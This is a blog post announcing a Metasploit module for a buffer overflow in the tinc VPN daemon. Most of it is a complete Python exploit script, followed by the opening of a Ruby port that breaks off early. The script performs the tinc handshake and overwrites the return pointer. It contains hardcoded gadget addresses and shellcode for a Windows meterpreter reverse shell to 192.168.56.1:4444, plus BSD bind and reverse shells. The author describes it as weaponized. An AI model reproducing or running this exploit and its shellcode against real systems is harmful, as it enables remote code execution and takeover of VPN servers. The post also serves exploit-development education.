Metasploit tincd module officially released

It took a while to do PoC changes, port from python to ruby, port from ruby to a metasploit module, change the used library in ruby, divide into two files (a tincd protocol library and an exploit module), write ROP chains for x86 and ARM architecture, support various operating systems and make all the necessary changes to make ruby people happy. But it was really a good experience.

I’m happy to announce that my tincd buffer overflow module I wrote a while ago is now officially part of Metasploit.

Tincd Metasploit module and exploit development

A friend of mine wrote a Proof of Concept exploit for the tincd server (a VPN software) for authenticated peers (post-auth), the original blog post about it can be found here. I turned the PoC crash into a weaponized exploit for Windows XP, Windows 7 and FreeBSD. I think very often the exploits on exploit-db.com do not contain a lot of information to reproduce the exploit development and a lot of “reversing” of “some hex bytes” is necessary to fully understand it. Therefore I provide several more detailed scripts in different programming languages with comments here. The vulnerability/my exploit/the software has the following characteristics:

  • No DEP, ASLR or other security mechanisms for the three OS. It’s the same setup file for both Windows (tinc-1.1pre6-install.exe). FreeBSD is compiled from the ports.
  • memcpy_chk protection introduced by gcc for Ubuntu. Seems to be non-exploitable (pretty sure it’s the same for Debian). gcc can easily do that because the buffer size is known at compile time.
  • Straight forward (memcpy) saved return pointer overwrite.
  • The second value on the stack when EIP is overwritten is a pointer to the start of our payload. Convenient.

I authored the exploiting part and changed the logic part to remove some issues. First, I wrote everything in python. Second, ported the entire thing to ruby with eventmachine. Then I decided to port the thing to metasploit and removed the eventmachine dependency. At that point I decided that improvements regarding reliability were necessary. The Metasploit module works for every of my test machines on the first try.

Ok, so everybody who just wants to see the outcome, go to my github page and download it. I also made a pull request and after some feedback it should end up in Metasploit (so maybe just check your Metasploit installation).

For everyone more interested in the “how”, the python script and the ruby script at the end of this post. The scripts are not as reliable, flexible, advanced, maintained and convenient as the Metasploit module. But they should provide everybody with enough information on how to exploit such a buffer overflow vulnerability.

Right now I’m writing the ROP chain for the exploitation on Fedora 19 (has NX enabled). Interesting and I’m already executing code, but not release ready yet. I hope I’ll be able to update the Metasploit module. There are so many other combinations that would be interesting too (ARM, x64, systems with ASLR…)

Happy hacking!

#!/usr/bin/env python

"""
Author of exploitation part (all platforms), changes to the original PoC crash for reliability, port from python to ruby, metasploit module: floyd <floyd at floyd dot ch>
Original PoC Author, finding: Martin Schobert <schobert at sitsec dot net>

Windows XP&7: The PoC now consists of two shellcodes, calc for XP and meterpreter for Windows 7 to 192.168.56.1:4444
That means now it's weaponized. Only tested on XP and Windows 7 with tinc-1.1pre6.

Ubuntu: A manually compiled version (1.1.pre6) on Ubuntu 12.10 with gcc 4.7.2 seems to be a non-exploitable crash, because
the bug is in a fixed size (MAXSIZE) struct member variable. Therefore the size of the destination is known 
at compile time. gcc is introducing a call to __memcpy_chk:
http://gcc.gnu.org/svn/gcc/branches/cilkplus/libssp/memcpy-chk.c
memcpy_chk does a __chk_fail call if the destination buffer is smaller than the source buffer. Therefore it will print 
*** buffer overflow detected *** and terminate (SIGABRT). The same result for tincd 10.0.19 (Jun 29 2012 14:10:44) 
which can be installed from the repository. It might be exploitable for versions compiled with an older version of gcc.
memcpy_chk seems to be in gcc since 2005: 
http://gcc.gnu.org/svn/gcc/branches/cilkplus/libssp/memcpy-chk.c
http://gcc.gnu.org/git/?p=gcc.git;a=history;f=libssp/memcpy-chk.c;hb=92920cc62318e5e8b6d02d506eaf66c160796088

FreeBSD: Exploitable, of course other eip for pop#ret, but same eip offset, tested under FreeBSD 9.1-RELEASE #0, tested with tinc version 1.0.19
from the ports.

<original comment PoC>

Unweaponized proof of concept code to demonstrate a vulnerability in the
tinc VPN software. This PoC was tested against tinc version 1.1-pre6 and
1.0.19.

http://www.sitsec.net/blog/2013/04/22/stack-based-buffer-overflow-in-the-vpn-software-tinc-for-authenticated-peers/

Author: Martin Schobert <schobert at sitsec dot net>
</original comment PoC>

July 2013, floyd <floyd at floyd dot ch> @floyd_ch
"""

import socket
import sys
import re
import os
import binascii
from Crypto.PublicKey import RSA
from Crypto.Cipher import Blowfish
from Crypto.Hash import SHA
from struct import pack
import asyncore

#
# config part
#

# host and port to attack
TCP_IP = '192.168.56.102'
TCP_PORT = 655

# The server's public key (usually from C:\Program Files\tinc\hosts\ or /usr/local/etc/tinc/testnet/hosts/ ,
# but with the config stuff removed)
server_public_key_file = 'rsa_key.pub'

# The client's private key
client_private_key_file = 'rsa_key.priv'

#target OS
target = "freebsd" #winxp (calc.exe), win7 (meterpreter/reverse_tcp lhost=192.168.56.1), freebsd (bsd/x86/shell_bind_tcp)



#
#Exploitation part WINDOWS (can be used to see Ubuntu __memcpy_chk)
#
#From original PoC
length = 1682
payload_winxp = "A"*length
#C:\Program Files\tinc>"C:\Program Files\Immunity Inc\Immunity Debugger\ImmunityDebugger.exe" "C:\Program Files\tinc\tincd.exe -D -d 5"
#!mona config -set workingfolder c:\logs\%p
#!mona pc 1682
#from C:\logs\tincd\pattern
cyclic = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce"
payload_winxp = cyclic
#!mona findmsp
#--> EIP overwritten with normal pattern : 0x64433864 (offset 1675)
offset = 1675
payload_winxp = "A"*offset + "BCDE"
#looks like second value on stack is pointing into our payload...
payload_winxp = "ABCD"+"E"*(offset-4)+"BCDE"
#removed \n from "\n"+payload in logic below from the original PoC
#so of course now we have to adjust everything we did until now:
length = 1683
offset = 1676 #original poc-offset is probably 1683 now
#search for pop; ret;
#!mona findwild -type instr -s "pop r32#ret"
#--> found 14739 pointers... so let's be very picky today:
#!mona findwild -n -cp asciiprint -type instr -s "pop r32#ret"
#--> found 348 pointers. e.g.
#0x662c4d71 : pop ebp # retn 10 | asciiprint,ascii {PAGE_EXECUTE_READ} [hnetcfg.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\hnetcfg.dll)
#0x662d3e7d : pop ebp # retn 10 | asciiprint,ascii {PAGE_EXECUTE_READ} [hnetcfg.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\hnetcfg.dll)
#0x662d6e5e : pop ebp # retn 10 | asciiprint,ascii {PAGE_EXECUTE_READ} [hnetcfg.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\hnetcfg.dll)
#0x662e1522 : pop ebp # retn 10 | asciiprint,ascii {PAGE_EXECUTE_READ} [hnetcfg.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\hnetcfg.dll)
eip = "qM,f" #"\x71\x4d\x2c\x66"
#This was just "nice to look at", but maybe it would be better to find a os-independent pointer, so we could use it for all os
#!mona findwild -o -type instr -s "pop r32#ret"
#--> found 4049 pointers. e.g.
#0x004fbd0e : pop esi # retf | startnull {PAGE_EXECUTE_READ} [tincd.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\tinc\tincd.exe)
#0x004a0293 : pop ecx # retf 4 | startnull {PAGE_EXECUTE_READ} [tincd.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\tinc\tincd.exe)
#0x00467de4 : pop ebx # retn 3956 | startnull {PAGE_EXECUTE_READ} [tincd.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\tinc\tincd.exe)
#0x00480990 : pop ebx # retn 3956 | startnull {PAGE_EXECUTE_READ} [tincd.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\tinc\tincd.exe)
#0x0051a9c3 : pop esi # retf 0bc3b | startnull {PAGE_EXECUTE_READ} [tincd.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\tinc\tincd.exe)
#0x0051a9cb : pop esi # retf 0bc3b | startnull {PAGE_EXECUTE_READ} [tincd.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\tinc\tincd.exe)
#0x0041caa6 : pop eax # retn | startnull {PAGE_EXECUTE_READ} [tincd.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\tinc\tincd.exe)
#eip = "\x0e\xbd\x4f\x00" #Nope! Access violation when reading [FFFFFFFF]
#eip = "\xe4\x7d\x46\x00" #Nope! Access violation when writing to [00232B7A]
eip = "\xa6\xca\x41\x00" #works fine on XP and on Windows 7
payload_winxp = "\xcc"*offset+eip #cc for int3
#works fine, our breakpoints get hit
calc_for_xp = ("\x31\xC9"
        "\x51"
        "\x68\x63\x61\x6C\x63"
        "\x54"  
        "\xB8\xC7\x93\xC2\x77" #  this one is not really reliable, it's: MOV EAX, msvcrt.system hard coded
        "\xFF\xD0")
shellcode = calc_for_xp
payload_winxp = shellcode+"\x90"*(offset-len(shellcode))+eip



#$ ./msfvenom -p windows/meterpreter/reverse_tcp exitfunc=thread lhost=192.168.56.1 -f c
meterpreter_win7 = (
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68"
"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01"
"\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50"
"\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a"
"\x05\x68\xc0\xa8\x38\x01\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10"
"\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e"
"\x08\x75\xec\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x00\x6a\x04\x56"
"\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10"
"\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a"
"\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6"
"\x85\xf6\x75\xec\xc3")
shellcode = meterpreter_win7
payload_win7 = shellcode+"\x90"*(offset-len(shellcode))+eip


#
#Exploitation part FREEBSD
#
#Using the windows exploit, we see that again, our eip gets executed (same offset as windows!),
#this means it's vulnerable. Used the version from ports, tinc version 1.0.19 
#(built Apr 11 2013 16:50:07, protocol 17)
#
#Reusing: offset = 1676
#Now we see that a pointer to our payload is again second on the stack. That means we need
#to find an address that points to some pop r32#ret, but this time for the freebsd version.
#It's not as easy as on windows, because we don't have something like mona findwild and gdb is
#not even correctly showing the disassembly at eip. That's why we dumped the .text part of the
#tincd binary in gdb, opened it in a hex editor and simply searched for the following bytes/opcodes
#that represent "pop r32#ret":
#58c3
#5bc3
#59c3
#5ac3
#5dc3
#5ec3
#5cc3
#5fc3
#We actually found a couple of 5dc3. We then calculated the correct address by using the
#start of the .text section plus the offset in the dumped memory. The first couple of 5dc3
#didn't work, but we found one at the following address that works very well:
eip = "\xBB\xBA\x04\x08" #eip for pop %ebp#ret for bsd --> 0x0804BABB
#so here we go:
#./msfvenom -p bsd/x86/shell_bind_tcp -f c
bind_shell_bsd = ("\x31\xc0\x50\x68\xff\x02\x11\x5c\x89\xe7\x50\x6a\x01\x6a\x02"
"\x6a\x10\xb0\x61\xcd\x80\x57\x50\x50\x6a\x68\x58\xcd\x80\x89"
"\x47\xec\xb0\x6a\xcd\x80\xb0\x1e\xcd\x80\x50\x50\x6a\x5a\x58"
"\xcd\x80\xff\x4f\xe4\x79\xf6\x50\x68\x2f\x2f\x73\x68\x68\x2f"
"\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0\x3b\xcd\x80")
#$ ./msfvenom -p bsd/x86/shell_reverse_tcp LHOST=192.168.56.1 -f c
reverse = ("\x68\xc0\xa8\x38\x01\x68\xff\x02\x11\x5c\x89\xe7\x31\xc0\x50"
"\x6a\x01\x6a\x02\x6a\x10\xb0\x61\xcd\x80\x57\x50\x50\x6a\x62"
"\x58\xcd\x80\x50\x6a\x5a\x58\xcd\x80\xff\x4f\xe8\x79\xf6\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x50"
"\xb0\x3b\xcd\x80")
#$ ./msfvenom -p bsd/x86/exec CMD="/usr/bin/touch /tmp/kkk" -f c
touch = (
"\x6a\x3b\x58\x99\x52\x68\x2d\x63\x00\x00\x89\xe7\x52\x68\x6e"
"\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\xe8\x18\x00\x00"
"\x00\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x74\x6f\x75\x63\x68"
"\x20\x2f\x74\x6d\x70\x2f\x6b\x6b\x6b\x00\x57\x53\x89\xe1\x52"
"\x51\x53\x50\xcd\x80")
shellcode = touch
payload_freebsd = shellcode+"\x90"*(offset-len(shellcode))+eip #pwn!








#
#Logic part
#

#NETWORK LAYER order (according to successful exploitation run monitored in wireshark):
#1. SYN, SYN/ACK, ACK - further TCP ACK's are not included
#2. ID, client PSH: "0 testnode2 17.0"
#3. ID, server PSH: "0 testnode2 17.0"
#4. Metakey, client PSH: "1 94 64 0 0 VALUE_1"
#5. Metakey, server PSH: "1 94 64 0 0 VALUE_2"
#6. Receive Challenge from server, server PSH: 515 bytes - 3f8a4c...
#7. Send Challenge to server, client PSH: 520 bytes - cdca80...
#--->9. Challenge Reply from server, server PSH: 43 bytes - d34d78...
#--->8. Challenge Reply to server, client PSH: 48 bytes - c2f415...
#--->11. ACK part1 of server, server PSH: 11 bytes - 93fdcf...
#--->10. ACK of client, client PSH: 16 bytes - 7ffca1...
#12. ACK part2 of server, server PSH: 69 bytes - e6051a...
#13. attack, client PSH: payload - 9d6a94...

#PROGRAM order (according to printing raw data before sending/after receiving - threading could get in the way of print!):
#1. SYN, SYN/ACK, ACK - further TCP ACK's are not included
#2. ID, client PSH: "0 testnode2 17.0"
#3. ID, server PSH: "0 testnode2 17.0"
#4. Metakey, client PSH: "1 94 64 0 0 VALUE_1"
#5. Metakey, server PSH: "1 94 64 0 0 VALUE_2"
#6. Receive Challenge from server, server PSH: 515 bytes - 3f8a4c...
#7. Send Challenge to server, client PSH: 520 bytes - cdca80...
#8. Challenge Reply to server, client PSH: 48 bytes - c2f415...
#9. Challenge Reply from server, server PSH: 43 bytes - d34d78...
#10. ACK of client, client PSH: 16 bytes - 7ffca1...
#11. ACK part1 of server, server PSH: 11 bytes - 93fdcf...
#12. ACK part2 of server, server PSH: 69 bytes - e6051a...
#13. attack, client PSH: payload - 9d6a94...


class TincExploitClient(asyncore.dispatcher):

    def __init__(self, host, port, server_file, client_file, payload):
        asyncore.dispatcher.__init__(self)
        self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
        self.connect((host, port))
        
        self.buffer = ''
        self.id()
        self.inbuffer = bytearray()
        
        self.payload = payload

        self.encryption_queue = [] # array of messages
        self.decryption_queue = bytearray()

        self.state = 'id'
        self.cryptomode_in = False
        
        self.bfblocksize = Blowfish.block_size
        self.key_stream = bytearray()
        
        self.client_private_key_cipher = None
        self.key_len = None
        
        self.hex_enc_key_S1 = None
        self.bf_enc_cipher = None
                
        self.initCiphers(server_file, client_file)
        
        self.bf_dec_cipher = None #gets set up when we get the server info
        
    def initCiphers(self, server_file, client_file):
        server_public_key_cipher = RSA.importKey(open(server_file).read())
        server_public_key_cipher_len =  (server_public_key_cipher.size() + 1)/8
        
        # parse client private key
        self.client_private_key_cipher = RSA.importKey(open(client_file).read())
        client_private_key_cipher_len =  (self.client_private_key_cipher.size() + 1)/8
        
        #must be same length
        assert(server_public_key_cipher_len == client_private_key_cipher_len)
        self.key_len = server_public_key_cipher_len
        
        #create random key
        key_S1 = os.urandom(self.key_len)
        print "random key: " + binascii.hexlify(key_S1)
        
        # encrypt rnd_key with rsa key
        enc_key_S1 = server_public_key_cipher.encrypt(key_S1, "")[0]
        self.hex_enc_key_S1 = binascii.hexlify(enc_key_S1)
        print "hex_enc_key_S1: " + self.hex_enc_key_S1
        
        # setup encryption
        bf_enc_key = key_S1[240:256]
        bf_enc_iv = key_S1[232:240]
        
        self.bf_enc_cipher = Blowfish.new(bf_enc_key, Blowfish.MODE_OFB, bf_enc_iv)
        
        #test cipher
        #fails: ValueError: Input strings must be a multiple of 8 in length
        #print "Testing cipher: "+self.bf_enc_cipher.encrypt("A"*10).encode("hex")
        #works:
        #print "Testing cipher: "+self.bf_enc_cipher.encrypt("A"*8).encode("hex")
        
    #
    # Helper function for byte-wise Output Feedback Mode decryption
    #
    # We use pycrypto to encrypt/decrypt data, but their OFM mode works
    # only on full blocks. The meta protocol requires encryption/decryption
    # on a byte basis. We use this helper function to decrypt incoming data
    # and add padding spaces to outgoing messages to use the default OFM
    # implementation.
    def decrypt(self, msg):
        #print "Cipher text:", str(msg).encode("hex")
        cleartext = ""
        while len(self.key_stream) < len(msg) + 8:
            ks = self.key_stream[len(self.key_stream)-8:]
            ks2 = self.bf_dec_cipher.encrypt(buffer(ks))
            self.key_stream.extend(bytearray(ks2))
        for d in msg:
            key_byte = self.key_stream.pop(0)
            cleartext += chr(key_byte ^ d)
        return cleartext
    
    def handle_connect(self):
        pass

    def handle_close(self):
        self.close()

    def handle_read(self):
        data = self.recv(8192)
        #self.receive_it(data)
        self.inbuffer += data
        
        print "waiting for %s - buffer-len=%d)" % \
            (self.state, len(self.inbuffer))

        if self.state == 'id':
            if(self.has_line()):
                print "\n++ Receive ID"
                data = self.get_line()
                print "received data: [%s]" % (data)
                self.state = 'metakey'
                self.metakey()                

        if self.state == 'metakey':
            if(self.has_line()):
                print "\n++ Receive METAKEY"
                data = self.get_line()
                print "received data: [%s]" % (data)
                data = data.split(' ')
                assert(data[0] == '1')
                hexkey_S2 = data[5].rstrip('\n')
                assert(len(hexkey_S2) == 512)
                self.enckey_S2 = binascii.unhexlify(hexkey_S2)
                key_S2 = self.client_private_key_cipher.decrypt(self.enckey_S2)

                print "key: " + binascii.hexlify(key_S2)

                # setup decryption
                bf_dec_key = key_S2[240:256]
                bf_dec_iv = key_S2[232:240]
                self.bf_dec_cipher = Blowfish.new(bf_dec_key, Blowfish.MODE_ECB)
                #global key_stream
                self.key_stream = bytearray( self.bf_dec_cipher.encrypt(bf_dec_iv))
                print "IV set"
                
                self.state = "challenge" # next expected state
                self.challenge()

        if self.state == 'challenge':
            need_len = 515
            if len(self.inbuffer) >= need_len:
                print "\n++ Receive CHALLENGE"
                data = self.pop_inbuffer_and_decrypt(need_len)
                print "Got challenge: [%s]" % (data)

                data = data.split(" ")
                assert(data[0] == "2")
                challenge2 = data[1][0:512]
                #print "Got challenge: [%s]" % (challenge2)
                challenge2 = binascii.unhexlify(challenge2)
                assert(len(challenge2) == 256)
                
                self.state = "challenge_reply"
                self.challenge_reply(challenge2)

        if self.state == 'challenge_reply':
            need_len = 43
            if len(self.inbuffer) >= need_len:
                print "\n++ Receive CHALLENGE REPLY"
                data = self.pop_inbuffer_and_decrypt(need_len).encode("hex") #"".join(map(chr, self.pop_inbuffer(need_len)))
                #data = self.decrypt(data)
                print "Got challenge reply: " + data
                self.state = "ack"
                self.ack()

        if self.state == 'ack':
            need_len = 12
            if len(self.inbuffer) >= need_len:
                data = self.pop_inbuffer_and_decrypt(need_len).encode("hex") #"".join(map(chr, self.pop_inbuffer(need_len)))
                #data = self.decrypt(self.bf_dec_cipher, data)
                print "Got ack: " + data
                self.overflow()


    def writable(self):
        return ((len(self.buffer) > 0) or (len(self.encryption_queue) > 0))
        
    #def send_it(self, buffer):
    #    print "####SENDING BUFFER: "+buffer.encode("hex")
    
    #def receive_it(self, buffer):
    #    print "####RECEIVING BUFFER: "+buffer.encode("hex")

    def handle_write(self):

        # send data
        #self.send_it(self.buffer)
        sent = self.send(self.buffer)
        self.buffer = self.buffer[sent:]
        print "send %d bytes (crypto-queue-len=%d msg,buffer-len=%d)" % (sent, len(self.encryption_queue), len(self.buffer))

        # handle encryption queue
        if len(self.encryption_queue) > 0:

            msg = self.encryption_queue.pop(0)
            print msg
            self.buffer += self.bf_enc_cipher.encrypt(msg)

        print "encryption-queue len: %d messages" % (len(self.encryption_queue))

        # send data
        #self.send_it(self.buffer)
        sent = self.send(self.buffer)
        self.buffer = self.buffer[sent:]
        print "send %d bytes (crypto-queue-len=%d msg,buffer-len=%d)" % (sent, len(self.encryption_queue), len(self.buffer))

    def pop_inbuffer(self, size):
        data = self.inbuffer[:size]
        self.inbuffer = self.inbuffer[size:]
        return data
    
    def pop_inbuffer_and_decrypt(self, size):
        data = self.inbuffer[:size]
        self.inbuffer = self.inbuffer[size:]
        data = self.decrypt(data)
        return data

    def get_line(self):
        idx = self.inbuffer.index('\n')
        data = self.inbuffer[:idx]
        self.inbuffer = self.inbuffer[idx+1:]
        return data

    def has_line(self):
        if '\n' in self.inbuffer:
            return True
        else:
            return False
    
    def id(self):
        print "\n++ Send ID"
        msg = "0 testnode2 17.0\n".replace("testnode2","home")
        print "id msg len: %d" % (len(msg))
        self.buffer += msg

    def metakey(self):
        print "\n++ Send METAKEY"
        msg = "1 94 64 0 0 %s\n" % (self.hex_enc_key_S1)
        print "metakey msg len: %d" % (len(msg))
        self.buffer += msg

    def challenge(self):
        print "\n++ Send CHALLENGE"
        challenge = os.urandom(self.key_len)
        msg = "2      %s\n" % (binascii.hexlify(challenge))
        self.encryption_queue.append(msg)

    def challenge_reply(self, challenge2):
        print "\n++ Send CHAL_REPLY"
        h = SHA.new()
        h.update(challenge2)
        msg = "3      %s\n" % (h.hexdigest().upper())
        self.encryption_queue.append(msg)

    def ack(self):
        print "++ Send ACK"
        self.encryption_queue.append("4 %d 123 0    \n" % (TCP_PORT))

    def overflow(self):
        print "++ Peng"
        buffer = self.payload #"\n" + payload #--> removed the \n so we can directly jump to second value on stack
        msg = "17 %d\n%s" % (len(buffer), buffer)

        plen = self.bfblocksize - divmod(len(msg),self.bfblocksize)[1]
        msg += 'B' * plen # append padding
        self.encryption_queue.append(msg)

payload = payload_winxp
if target.lower() == "win7":
    payload = payload_win7
elif target.lower() == "freebsd":
    payload = payload_freebsd
client = TincExploitClient(TCP_IP, TCP_PORT, server_public_key_file, client_private_key_file, payload)
asyncore.loop()

And here we go with the Ruby version:

=begin
Author of exploitation part (all platforms), changes to the original PoC crash for reliability, port from python to ruby, metasploit module: floyd <floyd at floyd dot ch>
Original PoC Author, finding: Martin Schobert <schobert@sitsec.net>

Windows XP&7: The PoC now consists of two shellcodes, calc for XP and meterpreter for Windows 7 to 192.168.56.1:4444
That means now it's weaponized. Only tested on XP and Windows 7 with tinc-1.1pre6.

Ubuntu: A manually compiled version (1.1.pre6) on Ubuntu 12.10 with gcc 4.7.2 seems to be a non-exploitable crash, because
the bug is in a fixed size (MAXSIZE) struct member variable. Therefore the size of the destination is known 
at compile time. gcc is introducing a call to __memcpy_chk:
http://gcc.gnu.org/svn/gcc/branches/cilkplus/libssp/memcpy-chk.c
memcpy_chk does a __chk_fail call if the destination buffer is smaller than the source buffer. Therefore it will print 
*** buffer overflow detected *** and terminate (SIGABRT). The same result for tincd 10.0.19 (Jun 29 2012 14:10:44) 
which can be installed from the repository. It might be exploitable for versions compiled with an older version of gcc.
memcpy_chk seems to be in gcc since 2005: 
http://gcc.gnu.org/svn/gcc/branches/cilkplus/libssp/memcpy-chk.c
http://gcc.gnu.org/git/?p=gcc.git;a=history;f=libssp/memcpy-chk.c;hb=92920cc62318e5e8b6d02d506eaf66c160796088

FreeBSD: Exploitable, of course other eip for pop#ret, but same eip offset, tested under FreeBSD 9.1-RELEASE #0, tested with tinc version 1.0.19
from the ports. Manually calculated offset of a pop#ret with offset in tincd binary.

<original comment PoC>

Unweaponized proof of concept code to demonstrate a vulnerability in the
tinc VPN software. This PoC was tested against tinc version 1.1-pre6 and
1.0.19.

http://www.sitsec.net/blog/2013/04/22/stack-based-buffer-overflow-in-the-vpn-software-tinc-for-authenticated-peers/

Author: Martin Schobert <schobert@sitsec.net>
</original comment PoC>

=end


require 'securerandom'
require 'openssl'
require 'digest/sha1'
require 'eventmachine'

#
# config
#

# host to attack
TCP_IP = "192.168.56.102"
TCP_PORT = 655

# The server's public key (usually from C:\Program Files\tinc\hosts\ or /usr/local/etc/tinc/testnet/hosts/),
# but with the config stuff removed
server_public_key_file = "rsa_key.pub"

# The client's private key
client_private_key_file = "rsa_key.priv"

#target OS
target = "freebsd" #winxp (calc.exe), win7 (meterpreter/reverse_tcp lhost=192.168.56.1), freebsd (bsd/x86/shell_bind_tcp)




#
#Exploitation part WINDOWS XP and 7 (can be used to see Ubuntu __memcpy_chk)
#
#From original PoC
length = 1682
payload_winxp = "A"*length
